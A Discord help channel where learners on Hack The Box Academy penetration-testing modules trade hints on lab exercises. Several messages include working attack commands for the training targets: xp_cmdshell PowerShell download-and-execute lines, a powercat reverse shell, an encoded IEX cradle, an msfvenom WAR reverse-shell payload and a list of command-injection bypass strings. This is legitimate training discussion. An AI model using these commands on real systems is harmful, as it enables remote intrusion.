HTB will not allow me to logg in even though it my first time today to try to logg in. I keep getting the message about new users only being allowed to log in once a day.

#

never mind. It suddenly let me in.

rustic sage
#

Hey am doing File Transfers, am on the Windows File Transfer Methods, on the question "Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.". I managed to upload the file I manged to unzip it, but when am running hasher I get "User do not have permission to read the file.". Is it the way i uploaded the file or should i escalate privileges to be able to run hasher?

sterile mirage
#

Hello,
In the active Infrastructure identification module, how do I add the vhosts?
In which module do I see that?

rustic sage
#

I'm absolutely stuk on the Password Attacks module, section Password Reuse / Default Passwords

arctic sentinel
#

Hello again! I`m trying to unhash the password, but with hashcat I get this...

#

The hex means it`s zipped?!

rustic sage
#

I found the users sam, kira and will. That's it. I cannot figure out how to proceed.

arctic sentinel
#

or I should use another wordlist...

arctic sentinel
#

Attacking common services, attacking SQL

acoustic owl
acoustic owl
rustic sage
#

I don't know what I'm missing. I already googled and foot r*** as a default user without a password. But it doesn't work.

sterile mirage
#

Hello,
In the active Infrastructure identification module, how do I add the vhosts?
In which module do I see that?

rustic sage
#

At the 2nd assessment of Brute Forcing they refer to an employee name you already know, do they refer to the username used in the previous skill assessment to login into the admin page?

#

Nvm, got it!

#

That threw me off lol

acoustic owl
quasi moth
#

Hi, can somebody help with the last task in Login Brute Forcing?

acoustic owl
frigid monolith
#

Anyone here got a sec to validate something on shells and payloads?

#

I think I know the right exploit its just not where the hint referred me to

arctic sentinel
rustic sage
placid quest
#

@rustic sage no

rustic sage
#

I just got the correct answer, finally. But i found out by just typing in all the possible answers from the list Bunny gave me. But i doubt that was the right way to do it. I tried hydra -C ... But that didnt work. I also couldn't find an open port for MySQL.

#

Now i got the right answer by luck, nothing more. But i don't know what I missed and what i was supposed to learn from this and how this will help me in the future.

solid python
#

Anybody have a nudge for the hard lab for NMAP enumeration?

#

Hint is oh so confusing on what it wants from me.

acoustic owl
rustic sage
#

I also assumed there was a connection with the previous credentials, because of the question. But apparently I was mistaken.

acoustic owl
#

Yes, this lesson is not about Hydra, but about standard passwords and how to get them.

rustic sage
#

Okay, got it. I was completely thrown off by the way the question was formulated and the information given about Hydra -C in that section, lol. Good to know. This one absolutely had me pulling my hair out.

graceful rampart
graceful rampart
#

Nice. Congrats on passing!

acoustic owl
#

Today I got the certificate, asked the admin if I could get the role and shortly afterwards I got the role.

acoustic owl
graceful rampart
#

I hope to be there soon

placid quest
#

@acoustic owl congratulations ๐ŸŽŠ ๐Ÿ‘ ๐Ÿ’ ๐Ÿฅณ ๐Ÿ™Œ

leaden quail
#

@acoustic owl nice job

#

how many days did you need?

fathom pendant
#

Congrats @acoustic owl

acoustic owl
leaden quail
#

long journey

tiny ledge
#

What happened with parrot terminal showing our own IP?

#

You need it so often, and it was handy to have there, why is it gone ?

#

like so:

storm comet
#

Hello, I downloaded and connected to the vpn and I'm able to do a ping and a nmap of the target machine
But i can't acces the webpage that it have can somebody help me?

#

I'm trying with Photobomb

rustic sage
#

@acoustic owl how many days did u study for the test? Any tips?

acoustic owl
acoustic owl
rustic sage
#

Does anyone know if there is a way to link my academy profile to discord?

storm comet
#

If that address is correct, here are three other things you can try:

Try again later.
Check your network connection.
If you are connected but behind a firewall, check that Firefox has permission to access the Web.
#

I think i have to verify my account to see #boxes

acoustic owl
old hound
#

what is the best way to find a password in .txt file using a cmd oneliner?

thorn urchin
#

grep

old hound
#

recursively? for the hole C: AND I have to change the directory

quasi moth
#

Hi, can somebody help with the last task in Login Brute Forcing?

rustic sage
#

I am doing Attacking SMB section under the Attacking Services Modules, I have found the share but do not access to get the contents of the share. I have tried bruteforcing with the user jason and robin, to know success withcrackmapexec.

#

Unsure what to do here

fathom pendant
old hound
#

and for windows?

fathom pendant
#

?

#

I'm not familiar with the text commands for windows

flat oxide
#

Can someone help me with Session Hijacking in XSS Module?

old hound
fathom pendant
#

Why not .* After "password"

old hound
#

/C:string Uses specified string as a literal search string.

fathom pendant
#

Well yes, I just mean when specifying the file type

old hound
#

good question but I guess you want to reduce the noise

real cedar
#

Cheers!
I am working on AD Enumeration & Attack - Skills Assessment Part II. I am trying to answer question 4, but I just dont get it. I|| created a userlist and got quite a lot of usernames with two letters and 3 numbers. I also sprayed all those users with the password I found for the first user against every machine, with no luck. Using rockyou came to mind, did it for around 15 minutes, but the progress is quite slow.|| I would appreciated any nudges.

graceful rampart
rustic sage
#

Hi. I'm stuck at:
https://academy.hackthebox.com/module/80/section/777

||I identified that I need to use: Uppercase/Lowercase/Numbers, I used the :upper: :lower: :digit: regex which gave me 5 passwords. They don't work. What am I doing wrong. Any nudge would help!||

rustic sage
unreal grail
#

Can someone knows about that error? I tried both with and without -smb2 options.

sly tapir
high sentinel
#

can you ping it? can you access the service?

rustic sage
unreal grail
high sentinel
#

what do you mean by join? If you can't ping the box how do you want to relay to it? that doesn't make sense

main ridge
#

Hi everyone. Today, after finishing the Information Security Foundations skill path, I'm beginning with the Penetration Tester job path and I'm looking for a study partner, if anyone is interested feel free to dm me ๐Ÿ™‚

high sentinel
main ridge
high sentinel
#

the job path? ๐Ÿ˜ฎ is that an academy thing? i though you were talking about doing a real pentesting job ๐Ÿ˜„

main ridge
#

yes, it's an academy "job path"

#

Penetration tester Job path

thorn falcon
#

can someone tell me how to fix this "Match file name by removing repeated file extension [example .accdb] then re-upload."!?

rustic sage
sly tapir
thorn falcon
#

But idk how to remove the repeated file....

high sentinel
old hound
#

I may need a hint with the Windows Privilege Assessment Part 1.
Question: "Find the password for the ldapadmin account somewhere on the system."

I just can't find it.
I skipped it and I am already NT Authority\System but still cant find it

thorn falcon
#

SAM is also a website that we turn our work into..

high sentinel
thorn falcon
high sentinel
high sentinel
night flax
#

Hi! Guys, Iโ€™ve been taking the course for pentesting, and Iโ€™ve been trying to scan the ip in the course, but must of the time, it said that the host is down. I have tried connecting to the academy vpn and everything, but it doesnโ€™t work anyway, any idea of what happening ? ๐Ÿค”

thorn falcon
thorn falcon
night flax
high sentinel
# night flax I mean, I think the ip is public,

then VPN is not needed, meaning you can scan anything in the internet. If it's something like 10.10.x.y then it's private. https://en.wikipedia.org/wiki/Private_network

In Internet networking, a private network is a computer network that uses a private address space of IP addresses. These addresses are commonly used for local area networks (LANs) in residential, office, and enterprise environments. Both the IPv4 and the IPv6 specifications define private IP address ranges.Private network addresses are not alloc...

night flax
#

Iโ€™ll check that, thank you ๐Ÿ™๐Ÿพ

night flax
still yacht
#

Hi I need some help with module/116/section/1512 I cant seem to get the subbrute to get the DNS that includes the flag? I put the target ip in etc/hosts as "ip ns1.inlanefreight.htb"

#

any suggestions

high sentinel
old hound
modest isle
#

Good morning guys

#

Anyone awake now?

stone jacinth
#

lol

modest isle
#

What's funny now:>?

#

I need help with the Academy please

stone jacinth
#

what is it?

coarse oak
modest isle
stone jacinth
#

ok

modest isle
#

I don't this queation" What is the path to the htb-student's mail?

#

I've been checking every content i the directory but there's nothing found there

#

Got an idea with the user's mail path??

fathom pendant
#

/mail/

ripe terrace
#

Up to AD enumeration and attacks. Here we go PepeProtecc

hard dew
#

I've started my CPTS journey and seem to have run into snag. I'm probably over thinking this but having trouble determining service version in Firewall and IDS/IPS Evasion - Hard Lab, I think ive figured out which port but cant seem to get the service version

fathom pendant
#

Have you tried connecting to it?

hard dew
#

yeah get a timeout

fathom pendant
#

Strange

fresh reef
#

Stuck on Attacking Email Services. I've grabbed the creds and just need to login to read the emails... connecting to imap server via curl isn't working and telnet/nc arent useful here....(right??) ...Please help lol @.@

fathom pendant
#

That is taught in the module

#

Or you can be big brain and use an email client

ripe terrace
#

Evolution FTW.

fresh reef
#

0.0 Am I Blind~~~? lol

hard dew
#

gonna try spinning up the cloud pwnbox provided, maybe a vpn issue

fresh reef
#

Lol heard, ill break down and read evo Docs, i got away with curl for so long haha

#

thank you

ripe terrace
#

I mean, it's not required, but I find it easier/quicker to visually work my way through a mailbox rather than interacting with IMAP/POP over the CLI.

fathom pendant
#

^

hard dew
#

i must have the wrong port getting a timeout in the cloud box as well

fathom pendant
uneven falcon
#

can someone help me with " submit root flag " on dashboard

fathom pendant
uneven falcon
unreal grail
#

I'm looking for someone that is done with the Crackmapexec module ๐Ÿ™‚

fathom pendant
raven maple
#

Is anyone able to assist me with the Footprinting Module and the DNS section. I've been stuck on the last question for the longest time. Attempting several different brute forces from the dig transfers.

fathom pendant
raven maple
#

yeah

fathom pendant
#

subdomains of subdomains, and may need a more ferocious wordlist ;)

raven maple
#

Ill give that a shot. I've been trying so many variations for this lol.

fathom pendant
#

the word list is in the dns discovery lists in seclists

#

if that helps narrow it down

raven maple
#

Yeah ๐Ÿ™‚

#

Ill give it a shot โค๏ธ

fathom pendant
#

but remember the subdomains you found can have their own subdomains

raven maple
#

Thats even more fun haha

fathom pendant
#

but you don't need to really go that far with the right wordlist

raven maple
#

Just curious. When you are using dnsenum, the IP that you use is it the original IP of the target IP or is it the one you find after zone transfers.

fathom pendant
#

you still use the original IP iirc

raven maple
#

Okay. That may save me some time.

fathom pendant
#

yep; it's just changing from the inlanefreight.htb to subdomain.inlanefreight.htb

raven maple
#

ah okay, that makes more sense. Thank you ๐Ÿ™‚

fathom pendant
#

and of course; the right wordlist, because the top lists will not have it

twin vine
#

For anyone struggling with Attacking Common Services - Medium, there's actually 6 open ports. Had to reset the target a few time to get more result.

still yacht
#

thanks

#

did try it to but only got 4

#

@twin vine should it work to find all ports with a normal nmap scan? or does it want -p-

twin vine
woeful ermine
#

Well some of the packages you are sending might drop or the one coming back

shadow stratus
#

Hi! I'm from Poland. I don't know anything about hacking, but I'd like to learn about the API. because there is such an application as ,,ลผabka,, and there are points to collect in it. apparently yes can be added to the application using the API. if he would like to help the cat, I would be grateful ๐Ÿ˜…

red obsidianBOT
fathom pendant
#

as far as API not much we can help on that

#

This really isn't the place to ask for this assistance; please read #welcome ; as this channel is for assistance with modules found on https://academy.hackthebox.com ; to access other channels you will need to verify your hack the box account ( https://www.hackthebox.com ) I understand you found this server through searching "hacking" on the search - but if you read #welcome it should tell you what this server is about

shadow stratus
#

Okay thanks โค๏ธ

rustic sage
#

IF YOUVE DONE ACTIVE DIRECTORY SKILLS PLEASE DM ME ILL GIVE U TACO FLAVORED KIIIISSSSSES

#

oops sry for caps

fathom pendant
#

clam it down sir

rustic sage
#

lol

fathom pendant
#

sometimes that do be how it is

near hinge
autumn pilot
#

make sure you have ssh'd into the target

near hinge
autumn pilot
#

okay, then try to use the find command

#

also you can check the environment variables

real cedar
sinful falcon
#

Wow, was not easy but I did it ๐Ÿคฃ

low vine
#

Great work!

sinful falcon
sly nebula
hushed cosmos
#

Hello! i have the same problem, can you help me?

rustic sage
#

I'll take a look

arctic sentinel
#

Good morning from Europeeee

#

Anyone working with attacking DNS!

ripe terrace
leaden quail
#

Hey Guys, How can i build Snaffler.exe or Rubeus.exe

#

wehn i download the Github Repos there are no exe files and no explaination how to install/build it.

sinful falcon
sinful falcon
summer lava
#

ON PIVOTING, TUNNELING, AND PORT FORWARDING module
Skills Assessment

#

how do i transfer the lsass back to my attack host

dim cosmos
#

the --local-auth requirement in the SMB attacking common services had me pulling my hair out lol

storm jackal
dim cosmos
#

as i now believe i understand it, we were trying to brute-force his local host creds not his domain creds

storm jackal
dim cosmos
#

the problem with little parameters missing off brute-forcing is that you always assume your wordlist is wrong not your command ๐Ÿ˜›

summer lava
storm jackal
summer lava
storm jackal
dim cosmos
#

you might need to use -smb2support also?

storm jackal
#

Yeah, good catch, that option is helpful for setting up the smb server

dim cosmos
#

are you working through the job path Gate?

summer lava
storm jackal
#

pip install impacket

summer lava
#

it works well, when i run python smbserver.py on my local host

storm jackal
#

oh okay good

summer lava
#

but when i transfer it to the linux machine.. it doesn't

dim cosmos
#

about to start the AD enumeration and attacks module, better grab a few litres of red bull

storm jackal
arctic sentinel
#

Hello, anyone working around the attacking DNS module?!?!

woeful ermine
#

there is no module like that

woeful ermine
arctic sentinel
#

Yeap, it`s from the attacking common services module!

#

Im using the tool subbrute but I cant make it work ๐Ÿ˜ฆ

woeful ermine
#

ohh

#

I had also problems with that part

#

what did you done so far?

arctic sentinel
#

Im going through many different names in the resolvers.txt file but doesnt find anything....

woeful ermine
#

have you add the ip and domain name to the /etc/hosts

arctic sentinel
#

I have tried that but now I realize maybe I did it with .com instead of .htb

#

I will try that...

woeful ermine
#

you should add that it doesnt work otherwise. If it is .htb you definitely need to add that

simple zephyr
#

I am working on attacking common services hard and trying to get a reverseshell through cmdshell. Can someone help me with my syntax. I am sure there are other ways to get the flag, but i want to test this out.|| EXECUTE ('xp_cmdshell ''powershell IEX-New-Object Net.webclient).downloadString('http://10.10.14.10.2/rev1.ps1')'')') AT [LOCAL.TEST.LINKED.SRV]||

woeful ermine
#

yeah I hate that part

arctic sentinel
woeful ermine
#

you need to go slowly and add " everytime it says there is problem

#

hahaha

simple zephyr
#

a better image

#

i got others to work, just all the ' within the command is messing me up lol

arctic sentinel
#

is there something with the ns1.inlafreight.htb that I need to change...

woeful ermine
simple zephyr
#

i am shitty as SQL lol be nice

woeful ermine
#

Yeah I was feeling the same. hahah

simple zephyr
#

do you mind DMing me an example

woeful ermine
#

well I wasnt go crazy like you. My commands were pretty simple

#

hahaha

#

like this

#

EXECUTE('xp_cmdshell ''dir C:\users''') AT [local.test.linked.srv]

simple zephyr
#

yeah i just want to see if i can get a reverseshell

woeful ermine
#

thats another one works

#

EXECUTE('sp_configure ''xp_cmdshell'', ''1''') AT [local.test.linked.srv]

#

you need to put more ' and fix paranthesis issue

woeful ermine
simple zephyr
#

yeah i have tried many different combinations and cant get it ๐Ÿ˜ฆ

woeful ermine
#

but it gives you an error saying this part have problem

#

it should guide you

arctic sentinel
simple zephyr
#
1> EXECUTE ('xp_cmdshell (''powershell IEX-New-Object Net.webclient).downloadString('''http://10.10.14.10.2/rev1.ps1''')'')') AT [LOCAL.TEST.LINKED.SRV]
2> go
Msg 102, Level 15, State 1
Server 'WIN-HARD\SQLEXPRESS', Line 1
Incorrect syntax near 'http:'.
river skiff
simple zephyr
#

ooo shit thanks

graceful rampart
#

It's not going to play nice with you using single quotes in the powershell command

carmine quail
simple zephyr
#

yeah i figured I attempted to convert to base to just run it, but I was limited to characters

graceful rampart
simple zephyr
#

I have 7 min left on the box lol and trying not to reset it again haha

arctic sentinel
carmine quail
#

I would try this @simple zephyr EXEC master..xp_cmdshell 'powershell.exe -nop -exec bypass -w1 -enc "SUVYIChpd3IgJ2h0dHA6Ly8xMC4xMC4xNC4xMC4yL3JldjEucHMxJykK"'

#

but I haven't tested that yet to see if it works - I'm not logged in to HTB atm

#

@simple zephyr I also just noticed something BIG in your command that will cause it to error out... your IP address is poorly formatted: http://10.10.14.10.2/rev1.ps1 there's too many octets

#

the encoded portion I have there represents the following command IEX (iwr 'http://10.10.14.10.2/rev1.ps1')

simple zephyr
#

yeah i fixed that... thanks I am going to give that a try. Also I guess I could have used my RDP connection to transfer the file also, but this is one of my weaknesses thats why I am trying to explore more than what is required.

#

have to head to work, so I will spin it up tonight or on my lunch break and give it a try.

zenith gazelle
#

Im doing the hard lab of nmap, and im having a hard time, i already scan and find a port filtered with db2. Tryed every type of scan (-sA, -sT, -sS / -T 1 ...)
Can someone help and say if im in the right direction or what am i missing?

flat oxide
#

Can I dm someone for the XSS assessment?

sly nebula
#

Kudos to the authors of the "USING CRACKMAPEXEC" module. I can only imagine how much effort must have been put into the final assessment. Nice job!

zenith gazelle
#

@flat oxide okay, i already did

rustic sage
#

I am doing Attacking SMB section under the Attacking Services Modules, I have found the share but do not access to get the contents of the share. I have tried bruteforcing with the user jason and robin, to know success withcrackmapexec.

zenith gazelle
old hound
#

what does this mean?

floral bone
#

if you type whoami - it will tell you who're connected as ๐Ÿ™‚

rustic sage
#

Can anyone help me out with my problem?

old hound
#

well it instantly breaks

young cave
#

has anyone else ran into problems running crackmapexec? I finally managed to install it but it won't run

graceful rampart
rustic sage
#

Im very confused why its not working

acoustic owl
rustic sage
#

okay

rustic sage
#

the very first user and pass are always correct, when i try the user as jason or robin never get results

#

oh lol

#

nvm

#

Msfconsole works.

#

got the answer

woeful ermine
#

If I am not mistaken fiona is not a user under sql. You need to bypass that and login with rdp creds. Its in th module

neat cape
#

Hey everyone! I just completed the Footprinting -Easy lab. I did use the hint though. Is there anyone here who solved it without the hint? I would to talk about my notes and the gaps in them

arctic sentinel
#

In the attacking email services, the list provided doesn`t content the user... or should it be there...

#

I have tried several username lists but no luck

woeful ermine
#

it should be the one in the resources

arctic sentinel
#

nvm got it ๐Ÿ™‚

woeful ermine
#

haha

woeful ermine
#

sure

median fog
#

I'm working on the skills assessment for the "Attacking Web Applications with Ffuf" module:
https://academy.hackthebox.com/module/54/section/511

The third question says:
"One of the pages you will identify should say 'You don't have access!'. What is the full page URL?"

I've identified that page (see screenshot) but when I paste in the URL it says "Incorrect answer". Do I need to do anything special with the formatting?

Edit: solved. As per the hint, you have to enter the word "PORT" rather than the actual port number.

arctic sentinel
#

Hello! Im in the attacking email servers section. Ive got the username and password but I don`t know how am I suppose to acces his mailbox

woeful ermine
#

have you done footprinting module

arctic sentinel
#

the commands of the pop3 doesnt work with this ESMTP console

#

I can`t list or do anything... only works the helo and other 2 commands

#

is there other way

woeful ermine
#

well the question is still the same

#

have you done footprinting

#

It takes a bit researching somethings not covered in th module

arctic sentinel
#

Yeah, but in footprinting I could use the normal USER PASS LIST RTRV commands

woeful ermine
#

If you taken notes open it check the things you ve done

#

or else take notes

#

hahaha

arctic sentinel
#

I have no notes over ESMTP commands

#

I just want to know if it is through here where I will enter the emails... maybe its in another place

rustic sage
#

hello

arctic sentinel
thorn urchin
#

<@&861185840277487616>

#

thanks ๐Ÿ‘

surreal rain
#

thanks

tidal kelp
#

has anyone finished this Attacking Common Services - Hard. could me help out / DM? thanks in advane. i have tried with sqlcmd but fail (edit: i connected and now Impersonating the "john" User, but i don't have role sysadmin)

autumn pilot
#

try something else

arctic sentinel
thorn urchin
graceful rampart
#

Afaik sqsh is broken on parrot as of now

rustic sage
#

Hi folks....raw beginner a little stuck here. (Q. What is the path to the htb-student's mail?) I have navigated to mail and PWD. result is /var/mail

#

but apparantly im wrong

fathom pendant
#

add another / after mail

rustic sage
#

ahhhhhhhhhh, thankyou so much.

#

/var/mail/ still coming up as incorrect

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

runic rampart
#

Good evening!Who can help with HTTPs/TLS Attacks:TLS Attacks - Skills Assessment?

fathom pendant
old hound
#

Who can help with: Windows Priv escalation assessment part 2?

dim hemlock
#

Hi guys, Can someone re-direct me to the correct Channel please:
Basically at my company we might have been "Hacked" I have found the IP Address but I would like to know more about it... Maybe someone is intersted ?

novel matrix
dim hemlock
#

Ahaa okay got ittt

sinful olive
#

Can I get some help here?
Module: SHELLS & PAYLOADS, The Live Engagement
I finished everything besides the War file.. Tried everything...
used msfvenum to create shell war file, upload it, but I got 404, or 500..
โ””โ”€โ”€โ•ผ $msfvenom -p java/jsp_shell_reverse_tcp lhost=IP.. lport=PORT.. -f war -o shell.war
Tried any other method I found, but still no luck..

echo roost
#

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 - not working anyone else have issue with this in module -
Active Directory Enumeration & Attacks

Page 14
Credentialed Enumeration - from Linux

Credentialed Enumeration - from Linux

old hound
echo roost
fathom pendant
#

"no route to host" kinda self explanatory; alongside "Rpc_s_access denied"

old hound
#

okay I need an info:
I have a reverse shell but it is only alive for 10 secs because the process kills itself.
I start a service and because it is not running correctly it will die.
How can I avoid it?

leaden quail
#

Im stuck since hours at the AD Skill Assessment Part 2 - Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

#

Im trying since hours so get a reverse shell with xp_cmdshell "command.." but no just errors ๐Ÿ˜ฆ

#

any hints?

old hound
#

windows server 2019?

fathom pendant
leaden quail
#

I open an http server

#

And trying:
1> xp_cmdshell 'powershell.exe -Command "IEX(New-Object System.Net.WebClient).DownloadString(''http://172.15.7.240:8001/powercat.ps'');powercat -c 172.16.7.240 -p 4444 -e cmd"'
2> go

#

tried different tools/methods, but nothing works

graceful rampart
leaden quail
#

Thats a copy+past mistake

graceful rampart
#

Well if your command got messed up while copying then I'm not looking at an accurate command

#

When you send any commands in here pit them between backticks (These: `)

gloomy sigil
#

Could anyone give me a nudge on Command Injection - Skills Assessment.
I'm trying to get CI in the endpoint ||GET /index.php?to=&dl=2470930823.txt||
I have spent few hours on this one. I have tried:
||\nwhoami
%0Awhoami
&ls
&&ls
%26ls
%26%26ls
%7Cls
%7C%7Cls
%7C%7Cwho\am\i
%7Cwho\am\i
%26%26who\am\i
%26who\am\i
%3Bwho\am\i
%60who\am\i%60
%60whoami%60
%24%28who\ami%29
%24%28whoami%29
;cat<2470930823.txt
3Bcat<2470930823.txt
%0Acat<2470930823.txt
%26cat<2470930823.txt
%26%26cat<2470930823.txt
%7C%7Ccat<2470930823.txt
%7Ccat<2470930823.txt
%60cat<2470930823.txt%60
%24%28cat<2470930823.txt%29
${LS_COLORS:10:1}cat<2470930823.txt
%26%26cAt<2470930823.txt
%26%26c\at<2470930823.txt
cat<2470930823.txt
$(cat<2470930823.txt)
%09$(cat<2470930823.txt)
%09%24%28cat<2470930823.txt%29
%09%60cat<2470930823.txt%60||
I'm out of ideas

raven cairn
#

Can hackthebox pls put back foxyproxy on pwnbox?

rustic sage
#

hey i dm you

fathom pendant
#

<@&861185840277487616>

#

feck off

rustic sage
#

@fathom pendant what percentage are u with cpts?

fathom pendant
#

I haven't touched it recently; been busy with health stuff

rustic sage
#

ahh ok just was curious

winged hedge
#

Thanks guys!

thorn urchin
fathom pendant
winged hedge
fathom pendant
#

strangely enough not #cwes

winged hedge
#

Thanks again for your contribution!

magic valve
#

Need some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack.

I have found user and password and I know the ip for the MS01 box but have tried multiple ways in logging into it with found credentials with no success.

Any help would be greatly appreciated!

still yacht
#

Anyone have done the attackaing common services SQL i got the password for the "Account" but where to go, to continue to enumerate flagDB?

devout torrent
#

In password Attack - Password Mutations, is there anyway to speed the whole process. Even with -t 40 in hydra, I need 40 minutes, to crack the password ( I mutated the included password list with best64.rule )

hoary pulsar
#

One question, where is the general chat?

hoary pulsar
#

thanks

rustic sage
#

also a few labs in pw attacks can take 30 -45 minutes only a few tho

stiff moon
#

in Attacking Common Applications at the Attacking GitLab the gitlab_userenum script dont work... dont know what to do.. metasploit dont work either ๐Ÿค”

honest ridge
#

in Footprinting - FTP there is a question "Which version of the FTP server is running on the target system? Submit the entire banner as the answer" ive done nmap banner grabs used metasploit ftp_version and a couple of other things with the same banner/result yet it says its wrong. Ive requested help but dont actually know what that does. any ideas on this ? cheers

fathom pendant
#

Try resetting the machine and grabbing it again

steady light
#

Nmap is giving it too, I think you were grabbing it with the "220" response code

honest ridge
#

^ yeah it was the response code that made it wrong..... whoops๐Ÿ˜‚

steady light
west canopy
wheat garden
# raven cairn Can hackthebox pls put back foxyproxy on pwnbox?

if your using it with burp its really better to use burps built in browser. Its stipped down with no secuirty but this streamlines web browser/application pentesting as alot of firefox, chrome and other browsers default settings and security interfere with web pentesting.

raven cairn
#

Yeah but you can configure firefox to have worse settings

west canopy
#

yep and if anyone is wondering its just the Open Browser button on the proxy tab. The burp Browser** also has the TLS cert already imported in case you are working with https (last time I checked.)

proud pine
#

FoxyProxy is also good if I want to quickly do HTTP through SOCKS

hard dew
#

anyone able to sanity check with me, im on Footprinting - Host Based Enumeration - FTP

#

not showing the version in nmap scans

fathom pendant
#

The version may not be what you're expecting, or just reset and try again

hard dew
#

oh hey MarcieLee, im scanning again now

#

got it now, think it was because i was grabbing the ID before the service name